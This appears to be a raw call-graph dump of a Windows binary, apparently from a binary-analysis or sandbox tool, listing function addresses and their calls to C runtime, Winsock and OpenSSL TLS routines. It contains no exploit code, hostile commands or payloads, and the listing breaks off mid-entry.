7ffd94717b18 104 API calls Concurrency::cancel_current_task 105823->105834 105835 7ffd94692b80 104 API calls 2 library calls 105824->105835 105827 7ffd9471a573 std::_Facet_Register 105827->105811 105829->105806 105836 7ffd947357e0 105831->105836 105835->105827 105841 7ffd94734a90 EnterCriticalSection 105836->105841 105842 7ffd94695670 105843 7ffd9469567c _Getctype 105842->105843 105850 7ffd94718178 105843->105850 105846 7ffd9469569e 105856 7ffd9469a600 107 API calls 2 library calls 105846->105856 105847 7ffd9469578a 105857 7ffd9471a510 8 API calls 2 library calls 105847->105857 105849 7ffd9469579d 105858 7ffd94734e58 105850->105858 105853 7ffd9471818a 105853->105846 105856->105847 105857->105849 105859 7ffd94734e61 105858->105859 105860 7ffd94734e78 105858->105860 105877 7ffd947293a8 13 API calls __free_lconv_mon 105859->105877 105871 7ffd94737ed0 105860->105871 105863 7ffd94734e66 105878 7ffd947297d4 102 API calls _invalid_parameter_noinfo_noreturn 105863->105878 105864 7ffd94734e85 105866 7ffd94718186 105864->105866 105879 7ffd947293a8 13 API calls __free_lconv_mon 105864->105879 105866->105853 105870 7ffd94717ba0 104 API calls Concurrency::cancel_current_task 105866->105870 105868 7ffd94734e8e 105880 7ffd947293a8 13 API calls __free_lconv_mon 105868->105880 105872 7ffd94737f0e 105871->105872 105873 7ffd94737eec 105871->105873 105901 7ffd94735660 105872->105901 105873->105872 105881 7ffd94737760 105873->105881 105876 7ffd94737f2c 105876->105864 105877->105863 105878->105866 105879->105868 105880->105866 105882 7ffd94737850 105881->105882 105897 7ffd94737795 __crtLCMapStringW 105881->105897 105927 7ffd94734a90 EnterCriticalSection 105882->105927 105884 7ffd947377ba LoadLibraryExW 105887 7ffd947378df 105884->105887 105888 7ffd947377df GetLastError 105884->105888 105886 7ffd947378f8 GetProcAddressForCaller 105886->105882 105887->105886 105891 7ffd947378ef FreeLibrary 105887->105891 105888->105897 105891->105886 105897->105882 105897->105884 105897->105886 105900 7ffd94737819 LoadLibraryExW 105897->105900 105900->105887 105900->105897 105928 7ffd9473fbb4 105901->105928 105904 7ffd94735678 105906 7ffd94735681 IsProcessorFeaturePresent 105904->105906 105910 7ffd947356ab _Getctype 105904->105910 105907 7ffd94735690 105906->105907 105944 7ffd94729508 14 API calls 2 library calls 105907->105944 105909 7ffd947356de 105945 7ffd947293a8 13 API calls __free_lconv_mon 105909->105945 105910->105909 105913 7ffd94735711 105910->105913 105912 7ffd947356e3 105946 7ffd947297d4 102 API calls _invalid_parameter_noinfo_noreturn 105912->105946 105915 7ffd94735724 105913->105915 105916 7ffd94735717 105913->105916 105931 7ffd9473d5bc 105915->105931 105947 7ffd947293a8 13 API calls __free_lconv_mon 105916->105947 105917 7ffd947356ee 105917->105876 105921 7ffd94735738 105948 7ffd947293a8 13 API calls __free_lconv_mon 105921->105948 105922 7ffd94735745 105938 7ffd94740164 105922->105938 105925 7ffd94735758 _Getctype 105949 7ffd9472e058 LeaveCriticalSection 105925->105949 105950 7ffd9473fb6c 105928->105950 105956 7ffd94734a90 EnterCriticalSection 105931->105956 105933 7ffd9473d5d3 105934 7ffd9473d630 _Getctype 15 API calls 105933->105934 105935 7ffd9473d5de 105934->105935 105936 7ffd94734ae4 std::_Locinfo::_Locinfo_ctor LeaveCriticalSection 105935->105936 105937 7ffd9473572e 105936->105937 105937->105921 105937->105922 105957 7ffd9473fe60 105938->105957 105941 7ffd947401bc 105941->105925 105943 7ffd9473fc04 102 API calls 4 library calls 105943->105904 105944->105910 105945->105912 105946->105917 105947->105917 105948->105917 105955 7ffd94734a90 EnterCriticalSection 105950->105955 105952 7ffd9473fb85 105953 7ffd94734ae4 std::_Locinfo::_Locinfo_ctor LeaveCriticalSection 105952->105953 105954 7ffd94735669 105953->105954 105954->105904 105954->105943 105958 7ffd9473fe9b __crtLCMapStringW 105957->105958 105967 7ffd94740062 105958->105967 105972 7ffd947466e0 102 API calls 4 library calls 105958->105972 105960 7ffd94740139 105976 7ffd947297d4 102 API calls _invalid_parameter_noinfo_noreturn 105960->105976 105962 7ffd9474006b 105962->105941 105969 7ffd94747604 105962->105969 105964 7ffd947400cd 105964->105967 105973 7ffd947466e0 102 API calls 4 library calls 105964->105973 105966 7ffd947400ec 105966->105967 105974 7ffd947466e0 102 API calls 4 library calls 105966->105974 105967->105962 105975 7ffd947293a8 13 API calls __free_lconv_mon 105967->105975 105977 7ffd94746bd4 105969->105977 105972->105964 105973->105966 105974->105967 105975->105960 105976->105962 105978 7ffd94746beb 105977->105978 105979 7ffd94746c09 105977->105979 106032 7ffd947293a8 13 API calls __free_lconv_mon 105978->106032 105979->105978 105982 7ffd94746c25 105979->105982 105981 7ffd94746bf0 106033 7ffd947297d4 102 API calls _invalid_parameter_noinfo_noreturn 105981->106033 105988 7ffd947471f0 105982->105988 105985 7ffd94746bfc 105985->105941 106035 7ffd94746f18 105988->106035 105991 7ffd94747263 106103 7ffd94729384 13 API calls __free_lconv_mon 105991->106103 105992 7ffd9474727b 106055 7ffd947460dc 105992->106055 106007 7ffd94746c50 106007->105985 106034 7ffd947460b4 LeaveCriticalSection 106007->106034 106011 7ffd94747268 106104 7ffd947293a8 13 API calls __free_lconv_mon 106011->106104 106032->105981 106033->105985 106036 7ffd94746f52 106035->106036 106037 7ffd94746f6c 106035->106037 106036->106037 106113 7ffd947293a8 13 API calls __free_lconv_mon 106036->106113 106042 7ffd94746fe4 106037->106042 106115 7ffd947293a8 13 API calls __free_lconv_mon 106037->106115 106039 7ffd94746f61 106114 7ffd947297d4 102 API calls _invalid_parameter_noinfo_noreturn 106039->106114 106041 7ffd94747035 106051 7ffd94747097 106041->106051 106119 7ffd947489f4 102 API calls 2 library calls 106041->106119 106042->106041 106117 7ffd947293a8 13 API calls __free_lconv_mon 106042->106117 106045 7ffd94747093 106048 7ffd94747115 106045->106048 106045->106051 106046 7ffd9474702a 106118 7ffd947297d4 102 API calls _invalid_parameter_noinfo_noreturn 106046->106118 106120 7ffd94729824 17 API calls _invalid_parameter_noinfo_noreturn 106048->106120 106050 7ffd94746fd9 106116 7ffd947297d4 102 API calls _invalid_parameter_noinfo_noreturn 106050->106116 106051->105991 106051->105992 106121 7ffd94734a90 EnterCriticalSection 106055->106121 106103->106011 106104->106007 106113->106039 106114->106037 106115->106050 106116->106042 106117->106046 106118->106041 106119->106045 106222 7ffda36e80d0 106228 7ffda36ec3b0 106222->106228 106224 7ffda36e80e9 106226 7ffda36e8127 106227 7ffda36e80e5 106227->106224 106236 7ffda36ec420 LeaveCriticalSection 106227->106236 106229 7ffda36ec3c2 106228->106229 106230 7ffda36ec3f6 EnterCriticalSection 106228->106230 106231 7ffda36ec3e4 106229->106231 106232 7ffda36ec3ce 106229->106232 106230->106227 106231->106230 106235 7ffda36ec3ed InitializeCriticalSection 106231->106235 106234 7ffda36ec3d0 Sleep 106232->106234 106234->106231 106234->106234 106235->106230 106236->106226 106237 7ffda3746c50 AcquireSRWLockExclusive 106238 7ffda3746e20 20 API calls 106237->106238 106239 7ffda3746c6e ReleaseSRWLockExclusive 106238->106239 106240 7ffda3738f90 106241 7ffda3738fcd 106240->106241 106242 7ffda3738fc3 106240->106242 106241->106242 106246 7ffda3735720 106241->106246 106243 7ffda3738fe5 106243->106242 106244 7ffda377f210 2 API calls 106243->106244 106244->106242 106247 7ffda3735740 106246->106247 106248 7ffda3735751 106246->106248 106247->106243 106249 7ffda377f210 2 API calls 106248->106249 106250 7ffda3735763 106249->106250 106250->106243 106251 7ffda373a9d0 106252 7ffda373aa0b 106251->106252 106254 7ffda373aa00 106251->106254 106252->106254 106255 7ffda373bcc0 106252->106255 106258 7ffda373bd20 106255->106258 106256 7ffda377f210 2 API calls 106256->106258 106257 7ffda373c2f2 106257->106254 106258->106256 106258->106257 106259 7ffda373be59 WSASetLastError 106258->106259 106259->106258 106260 7ffda36d3bc7 106261 7ffda36d3bd6 106260->106261 106262 7ffda36d3c75 106261->106262 106263 7ffda36d3c68 free 106261->106263 106264 7ffda36d3ce3 106262->106264 106341 7ffda36f4cf0 17 API calls Concurrency::details::SchedulerProxy::DeleteThis 106262->106341 106263->106262 106265 7ffda36d3cea socket 106264->106265 106267 7ffda36d3d6b 106265->106267 106268 7ffda36d3d06 WSAGetLastError 106265->106268 106322 7ffda36d90d0 106267->106322 106270 7ffda36d3e0a 106268->106270 106271 7ffda36d3d20 106268->106271 106269 7ffda36d3cbf 106269->106264 106269->106265 106273 7ffda36d3ccd _strdup 106269->106273 106282 7ffda36d404b connect 106270->106282 106283 7ffda36d3e5c 106270->106283 106284 7ffda36d3e32 strtol 106270->106284 106271->106270 106274 7ffda36d3d34 106271->106274 106273->106265 106278 7ffda36d90d0 25 API calls 106274->106278 106276 7ffda36d3dd1 106345 7ffda36f3980 ioctlsocket 106276->106345 106277 7ffda36d3d7f setsockopt 106277->106276 106279 7ffda36d3dae WSAGetLastError 106277->106279 106281 7ffda36d3d43 106278->106281 106344 7ffda36ec450 21 API calls Concurrency::details::SchedulerProxy::DeleteThis 106279->106344 106342 7ffda36ec450 21 API calls Concurrency::details::SchedulerProxy::DeleteThis 106281->106342 106288 7ffda36d4070 WSAGetLastError 106282->106288 106301 7ffda36d3d66 106282->106301 106283->106282 106291 7ffda36d3e94 _errno strtol 106283->106291 106308 7ffda36d3f05 106283->106308 106284->106283 106289 7ffda36d3e4d 106284->106289 106286 7ffda36d3ddd 106286->106270 106292 7ffda36d3de1 WSAGetLastError 106286->106292 106294 7ffda36d4081 WSAGetLastError 106288->106294 106288->106301 106348 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106289->106348 106290 7ffda36d3dc8 106347 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106290->106347 106296 7ffda36d3ec0 _errno 106291->106296 106291->106308 106346 7ffda36ec450 21 API calls Concurrency::details::SchedulerProxy::DeleteThis 106292->106346 106293 7ffda36d3d54 106343 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106293->106343 106299 7ffda36d4092 WSAGetLastError 106294->106299 106294->106301 106302 7ffda36d3ecf 106296->106302 106296->106308 106299->106301 106306 7ffda36d40a3 WSAGetLastError 106299->106306 106304 7ffda36f6230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 106301->106304 106302->106308 106313 7ffda36d3ee0 isspace 106302->106313 106309 7ffda36d4dc9 106304->106309 106354 7ffda36d6990 33 API calls Concurrency::details::SchedulerProxy::DeleteThis 106306->106354 106311 7ffda36d3fa8 106308->106311 106312 7ffda36d3f44 WSAGetLastError 106308->106312 106349 7ffda36da920 31 API calls Concurrency::details::SchedulerProxy::DeleteThis 106308->106349 106350 7ffda36dafa0 9 API calls Concurrency::details::SchedulerProxy::DeleteThis 106308->106350 106352 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106308->106352 106315 7ffda36d3fb5 _errno strtol 106311->106315 106316 7ffda36d4012 106311->106316 106351 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106312->106351 106313->106302 106313->106308 106317 7ffda36d4014 106315->106317 106318 7ffda36d3fda _errno 106315->106318 106316->106282 106317->106282 106353 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106317->106353 106318->106317 106319 7ffda36d3fe5 106318->106319 106319->106282 106319->106316 106321 7ffda36d3ff1 isspace 106319->106321 106321->106317 106321->106319 106323 7ffda36d90ff 106322->106323 106332 7ffda36d914f 106322->106332 106358 7ffda36ee2f0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 106323->106358 106325 7ffda36d912a 106326 7ffda36e2c50 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 106325->106326 106327 7ffda36d9136 106326->106327 106359 7ffda36ebf90 17 API calls Concurrency::details::SchedulerProxy::DeleteThis 106327->106359 106328 7ffda36d91ef 106331 7ffda36e2c50 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 106328->106331 106330 7ffda36d914a 106335 7ffda36f6230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 106330->106335 106333 7ffda36d91fb 106331->106333 106332->106328 106337 7ffda36d91c7 106332->106337 106360 7ffda36ebf90 17 API calls Concurrency::details::SchedulerProxy::DeleteThis 106333->106360 106336 7ffda36d3d7a 106335->106336 106336->106276 106336->106277 106355 7ffda36e2c50 106337->106355 106341->106269 106342->106293 106343->106301 106344->106290 106345->106286 106346->106290 106347->106270 106348->106283 106349->106308 106350->106308 106351->106308 106352->106308 106353->106316 106354->106301 106361 7ffda36e2e10 106355->106361 106358->106325 106359->106330 106360->106330 106362 7ffda36e2c5e 106361->106362 106363 7ffda36e2e1f GetLastError 106361->106363 106364 7ffda36ec3b0 Concurrency::details::SchedulerProxy::DeleteThis 3 API calls 106363->106364 106365 7ffda36e2e38 106364->106365 106366 7ffda36e2e43 getenv 106365->106366 106368 7ffda36e2e6a 106365->106368 106366->106368 106370 7ffda36ec420 LeaveCriticalSection 106368->106370 106369 7ffda36e2e7d SetLastError 106369->106362 106370->106369 106371 7ffda378ef50 106372 7ffda378ef7b 106371->106372 106373 7ffda378ef86 106371->106373 106373->106372 106374 7ffda378eff6 106373->106374 106377 7ffda378c9c0 106373->106377 106374->106372 106375 7ffda377f210 2 API calls 106374->106375 106375->106372 106379 7ffda378c9ee 106377->106379 106378 7ffda378c9f6 106378->106374 106379->106378 106382 7ffda378ca2d 106379->106382 106384 7ffda378cb80 106379->106384 106382->106378 106383 7ffda378cadd WSAGetLastError 106382->106383 106398 7ffda378d010 106382->106398 106383->106378 106385 7ffda378cbc3 106384->106385 106386 7ffda378cc14 GetModuleHandleW GetProcAddress 106385->106386 106389 7ffda378cc5e 106385->106389 106387 7ffda378cc36 106386->106387 106386->106389 106387->106389 106388 7ffda378cde7 106390 7ffda378ce3a calloc 106388->106390 106396 7ffda378cd8f 106388->106396 106389->106388 106392 7ffda378cd57 106389->106392 106393 7ffda378cd70 memmove 106389->106393 106391 7ffda378ce6f 106390->106391 106397 7ffda378ce56 106390->106397 106394 7ffda378ced2 free 106391->106394 106391->106397 106392->106382 106393->106396 106395 7ffda3779b00 9 API calls 106394->106395 106395->106397 106396->106388 106396->106390 106397->106392 106399 7ffda378d04e 106398->106399 106400 7ffda378d0ab 106399->106400 106401 7ffda378d083 malloc 106399->106401 106410 7ffda378d5be 106399->106410 106402 7ffda378d0de 106400->106402 106403 7ffda378d0b4 malloc 106400->106403 106401->106400 106401->106410 106404 7ffda378d0f1 realloc 106402->106404 106411 7ffda378d14a 106402->106411 106403->106402 106403->106410 106407 7ffda378d106 106404->106407 106404->106411 106405 7ffda378d1ab malloc 106406 7ffda378d23f memmove 106405->106406 106405->106410 106408 7ffda378d2a0 free 106406->106408 106407->106382 106408->106410 106408->106411 106409 7ffda3779b00 9 API calls 106409->106410 106411->106405 106412 7ffda378d36d memmove 106411->106412 106414 7ffda378d390 106411->106414 106415 7ffda378d540 106411->106415 106412->106411 106412->106414 106413 7ffda378d50a 106417 7ffda3779b00 9 API calls 106413->106417 106414->106410 106414->106413 106414->106415 106416 7ffda378d47d 106414->106416 106415->106409 106415->106410 106418 7ffda378d493 memset 106416->106418 106420 7ffda378d4b8 106416->106420 106417->106420 106418->106420 106419 7ffda378d53a CertFreeCertificateContext 106419->106415 106420->106415 106420->106419 106421 7ffda36e8140 106422 7ffda36e816c WSASetLastError ERR_clear_error 106421->106422 106423 7ffda36e8153 106421->106423 106426 7ffda36e9b23 106422->106426 106482 7ffda36e8d70 106423->106482 106429 7ffda36e9b2d WSAGetLastError SSL_get_error ERR_get_error 106426->106429 106430 7ffda36e9d4e 106426->106430 106428 7ffda36e815c 106644 7ffda36e8180 X509_free ENGINE_finish ENGINE_free 106428->106644 106432 7ffda36e9b59 106429->106432 106433 7ffda36e9c6d 106429->106433 106437 7ffda36e9dac 106430->106437 106438 7ffda36e9d66 ERR_get_error 106430->106438 106435 7ffda36e9b8a 106432->106435 106441 7ffda36e9b70 106432->106441 106468 7ffda36e9b91 106432->106468 106654 7ffda36e8c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106433->106654 106434 7ffda36e8164 106440 7ffda36f6230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 106435->106440 106662 7ffda36e7c30 78 API calls Concurrency::details::SchedulerProxy::DeleteThis 106437->106662 106659 7ffda36e8c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106438->106659 106439 7ffda36e9c74 106655 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106439->106655 106446 7ffda36e9dd1 106440->106446 106645 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106441->106645 106445 7ffda36e9c4a 106445->106435 106653 7ffda36e8180 X509_free ENGINE_finish ENGINE_free 106445->106653 106448 7ffda36e9d72 106660 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106448->106660 106449 7ffda36e9c89 106452 7ffda36e9c95 free 106449->106452 106453 7ffda36e9c9e 106449->106453 106450 7ffda36e9b82 106646 7ffda36e8180 X509_free ENGINE_finish ENGINE_free 106450->106646 106452->106453 106454 7ffda36e9cb9 106453->106454 106455 7ffda36e9ce3 106453->106455 106460 7ffda36e9d09 106454->106460 106475 7ffda36e9cd4 106454->106475 106455->106445 106455->106460 106458 7ffda36e9d87 106458->106445 106462 7ffda36e9d97 free 106458->106462 106459 7ffda36e9bff 106461 7ffda36e9c3b 106459->106461 106464 7ffda36e9c08 106459->106464 106657 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106460->106657 106652 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106461->106652 106661 7ffda36e8180 X509_free ENGINE_finish ENGINE_free 106462->106661 106649 7ffda36ec450 21 API calls Concurrency::details::SchedulerProxy::DeleteThis 106464->106649 106467 7ffda36e9d42 106658 7ffda36e8180 X509_free ENGINE_finish ENGINE_free 106467->106658 106468->106459 106472 7ffda36e9bd4 106468->106472 106470 7ffda36e9cdc 106470->106435 106647 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106472->106647 106473 7ffda36e9c1a 106650 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106473->106650 106656 7ffda36e8180 X509_free ENGINE_finish ENGINE_free 106475->106656 106476 7ffda36e9c2c 106651 7ffda36e8180 X509_free ENGINE_finish ENGINE_free 106476->106651 106480 7ffda36e9bf0 106648 7ffda36e8180 X509_free ENGINE_finish ENGINE_free 106480->106648 106500 7ffda36e8daa 106482->106500 106484 7ffda36e8e51 TLS_method SSL_CTX_new 106486 7ffda36e8e98 ERR_get_error 106484->106486 106492 7ffda36e8ec5 106484->106492 106689 7ffda36e8c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106486->106689 106488 7ffda36e8ef0 SSL_CTX_set_default_passwd_cb SSL_CTX_set_default_passwd_cb_userdata 106490 7ffda36e8f0a SSL_CTX_set_cert_cb SSL_CTX_set_options 106488->106490 106489 7ffda36e8ea4 106690 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106489->106690 106495 7ffda36e8f35 106490->106495 106498 7ffda36e8fa1 106490->106498 106492->106488 106492->106490 106492->106492 106493 7ffda36e9804 106494 7ffda36e980d free 106493->106494 106605 7ffda36e9513 106493->106605 106494->106605 106495->106498 106691 7ffda36e9df0 isupper tolower isupper tolower 106495->106691 106497 7ffda36e9015 106505 7ffda36f1830 Concurrency::details::SchedulerProxy::DeleteThis 12 API calls 106497->106505 106517 7ffda36e904e 106497->106517 106498->106497 106694 7ffda36e9df0 isupper tolower isupper tolower 106498->106694 106499 7ffda36e8f53 106503 7ffda36e8f58 106499->106503 106504 7ffda36e8f73 SSL_CTX_ctrl 106499->106504 106500->106484 106663 7ffda36d65b0 memset SHGetFolderPathA 106500->106663 106501 7ffda36f6230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 106506 7ffda36e8158 106501->106506 106692 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106503->106692 106504->106498 106511 7ffda36e8f89 ERR_get_error 106504->106511 106505->106517 106506->106422 106506->106428 106507 7ffda36e8fc7 106508 7ffda36e8fcc 106507->106508 106509 7ffda36e8fe7 SSL_CTX_ctrl 106507->106509 106695 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106508->106695 106509->106497 106513 7ffda36e8ffd ERR_get_error 106509->106513 106693 7ffda36e8c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106511->106693 106696 7ffda36e8c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106513->106696 106514 7ffda36e8f6e 106519 7ffda36e98a9 SSL_CTX_free 106514->106519 106516 7ffda36e90ed 106522 7ffda36e9218 106516->106522 106669 7ffda36f3450 106516->106669 106517->106516 106521 7ffda36e90c4 SSL_CTX_set_default_verify_paths 106517->106521 106519->106605 106520 7ffda36e8f95 106723 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106520->106723 106524 7ffda36e90d5 ERR_get_error 106521->106524 106537 7ffda36e9213 106521->106537 106525 7ffda36e9224 106522->106525 106522->106537 106697 7ffda36e8c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106524->106697 106529 7ffda36e923f 106525->106529 106530 7ffda36e922e 106525->106530 106701 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106529->106701 106700 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106530->106700 106532 7ffda36e9894 106532->106519 106536 7ffda36e98a0 free 106532->106536 106534 7ffda36e910f 106539 7ffda36e9124 ERR_get_error 106534->106539 106562 7ffda36e914f 106534->106562 106536->106519 106538 7ffda36f1830 Concurrency::details::SchedulerProxy::DeleteThis 12 API calls 106537->106538 106543 7ffda36e927e 106537->106543 106538->106543 106698 7ffda36e8c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106539->106698 106540 7ffda36e92d1 SSL_new 106546 7ffda36e9873 ERR_get_error 106540->106546 106547 7ffda36e939f SSL_set_ex_data 106540->106547 106543->106540 106545 7ffda36f3450 67 API calls 106543->106545 106544 7ffda36e9130 106699 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106544->106699 106549 7ffda36e92f7 106545->106549 106722 7ffda36e8c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106546->106722 106547->106546 106550 7ffda36e93b4 106547->106550 106553 7ffda36e92fb _errno 106549->106553 106554 7ffda36e9347 106549->106554 106706 7ffda36e98f0 9 API calls Concurrency::details::SchedulerProxy::DeleteThis 106550->106706 106552 7ffda36e914a 106552->106532 106553->106540 106556 7ffda36e9306 _errno 106553->106556 106554->106540 106561 7ffda36e9359 ERR_get_error 106554->106561 106556->106540 106559 7ffda36e9311 _errno 106556->106559 106557 7ffda36e93c2 106557->106546 106560 7ffda36e93ca SSL_CTX_free 106557->106560 106558 7ffda36e91f0 X509_STORE_load_locations 106563 7ffda36e9203 X509_STORE_set_flags 106558->106563 106564 7ffda36e920e ERR_clear_error 106558->106564 106702 7ffda36f3e00 18 API calls Concurrency::details::SchedulerProxy::DeleteThis 106559->106702 106566 7ffda36e93e9 106560->106566 106577 7ffda36e9499 106560->106577 106704 7ffda36e8c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106561->106704 106562->106537 106562->106558 106562->106564 106571 7ffda36f1830 Concurrency::details::SchedulerProxy::DeleteThis 12 API calls 106562->106571 106563->106564 106564->106537 106573 7ffda36e941b strspn 106566->106573 106566->106577 106568 7ffda36e932b 106703 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106568->106703 106569 7ffda36e96ac 106574 7ffda36f1830 Concurrency::details::SchedulerProxy::DeleteThis 12 API calls 106569->106574 106581 7ffda36e9693 106569->106581 106570 7ffda36e9365 106705 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106570->106705 106576 7ffda36e91eb 106571->106576 106578 7ffda36e9432 106573->106578 106574->106581 106576->106558 106577->106569 106577->106577 106580 7ffda36e94d2 strchr 106577->106580 106578->106577 106578->106578 106584 7ffda36e9440 strchr 106578->106584 106579 7ffda36e981b 106589 7ffda36e9849 SSL_set_options 106579->106589 106579->106605 106580->106581 106583 7ffda36e94e5 106580->106583 106581->106579 106582 7ffda36e97cd SSL_check_private_key 106581->106582 106585 7ffda36f3450 67 API calls 106581->106585 106582->106579 106586 7ffda36e97de ERR_get_error 106582->106586 106583->106581 106587 7ffda36e94f6 _strdup 106583->106587 106584->106577 106588 7ffda36e9452 SSL_ctrl 106584->106588 106590 7ffda36e970b 106585->106590 106720 7ffda36e8c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106586->106720 106592 7ffda36e9518 strchr 106587->106592 106593 7ffda36e9504 106587->106593 106588->106577 106594 7ffda36e946c ERR_get_error 106588->106594 106589->106605 106595 7ffda36e973c 106590->106595 106596 7ffda36e970f _errno 106590->106596 106599 7ffda36e9534 106592->106599 106709 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106593->106709 106707 7ffda36e8c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106594->106707 106602 7ffda36e976c 106595->106602 106603 7ffda36e9753 106595->106603 106717 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106596->106717 106597 7ffda36e97b3 106721 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106597->106721 106609 7ffda36e9587 106599->106609 106610 7ffda36e9540 ERR_get_error 106599->106610 106602->106582 106612 7ffda36e9788 ERR_get_error 106602->106612 106718 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106603->106718 106605->106501 106606 7ffda36e9478 106708 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106606->106708 106617 7ffda36e9593 ERR_get_error 106609->106617 106618 7ffda36e95f1 106609->106618 106710 7ffda36e8c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106610->106710 106719 7ffda36e8c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106612->106719 106614 7ffda36e8eb9 106614->106493 106616 7ffda36e954c 106711 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106616->106711 106712 7ffda36e8c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106617->106712 106629 7ffda36e960b ERR_get_error 106618->106629 106630 7ffda36e965a 106618->106630 106619 7ffda36e9794 SSL_use_PrivateKey_file 106619->106597 106622 7ffda36e97bf 106619->106622 106622->106582 106625 7ffda36e97c4 free 106622->106625 106623 7ffda36e9564 106626 7ffda36e9579 free 106623->106626 106627 7ffda36e9570 free 106623->106627 106624 7ffda36e959f 106713 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106624->106713 106625->106582 106626->106605 106627->106626 106714 7ffda36e8c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106629->106714 106637 7ffda36e9683 free 106630->106637 106638 7ffda36e966e ERR_get_error 106630->106638 106631 7ffda36e95b7 106634 7ffda36e95cc ENGINE_free free 106631->106634 106635 7ffda36e95c3 free 106631->106635 106633 7ffda36e9617 106715 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106633->106715 106634->106605 106635->106634 106637->106581 106716 7ffda36e8c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106638->106716 106641 7ffda36e9634 106642 7ffda36e9649 ENGINE_finish 106641->106642 106643 7ffda36e9640 free 106641->106643 106642->106634 106643->106642 106644->106434 106645->106450 106646->106435 106647->106480 106648->106435 106649->106473 106650->106476 106651->106435 106652->106445 106653->106435 106654->106439 106655->106449 106656->106470 106657->106467 106658->106470 106659->106448 106660->106458 106661->106470 106662->106445 106664 7ffda36d660b 106663->106664 106665 7ffda36d6607 106663->106665 106666 7ffda36f1830 Concurrency::details::SchedulerProxy::DeleteThis 12 API calls 106664->106666 106667 7ffda36f6230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 106665->106667 106666->106665 106668 7ffda36d6634 106667->106668 106668->106484 106724 7ffda36f36a0 106669->106724 106671 7ffda36f6230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 106672 7ffda36e9107 106671->106672 106672->106522 106672->106534 106673 7ffda36f3687 _errno 106677 7ffda36f361c 106673->106677 106674 7ffda36f3486 106674->106673 106675 7ffda36f365c _errno 106674->106675 106674->106677 106678 7ffda36f3649 _errno 106674->106678 106681 7ffda36f3523 _errno 106674->106681 106683 7ffda36f35e7 CloseHandle 106674->106683 106684 7ffda36f59c0 37 API calls 106674->106684 106685 7ffda36f3594 _errno 106674->106685 106742 7ffda36f4380 106674->106742 106756 7ffda36f37f0 20 API calls Concurrency::details::SchedulerProxy::DeleteThis 106674->106756 106676 7ffda36f3667 RtlGetLastNtStatus 106675->106676 106675->106677 106676->106677 106680 7ffda36f3674 _errno 106676->106680 106677->106671 106678->106677 106680->106677 106681->106674 106683->106674 106684->106674 106686 7ffda36f35bf _errno 106685->106686 106687 7ffda36f359f RtlGetLastNtStatus 106685->106687 106686->106674 106687->106686 106688 7ffda36f35ac _errno 106687->106688 106688->106674 106689->106489 106690->106614 106691->106499 106692->106514 106693->106520 106694->106507 106695->106514 106696->106520 106697->106520 106698->106544 106699->106552 106700->106514 106701->106514 106702->106568 106703->106514 106704->106570 106705->106552 106706->106557 106707->106606 106708->106614 106709->106605 106710->106616 106711->106623 106712->106624 106713->106631 106714->106633 106715->106641 106716->106633 106717->106605 106718->106605 106719->106619 106720->106597 106721->106493 106722->106520 106723->106532 106725 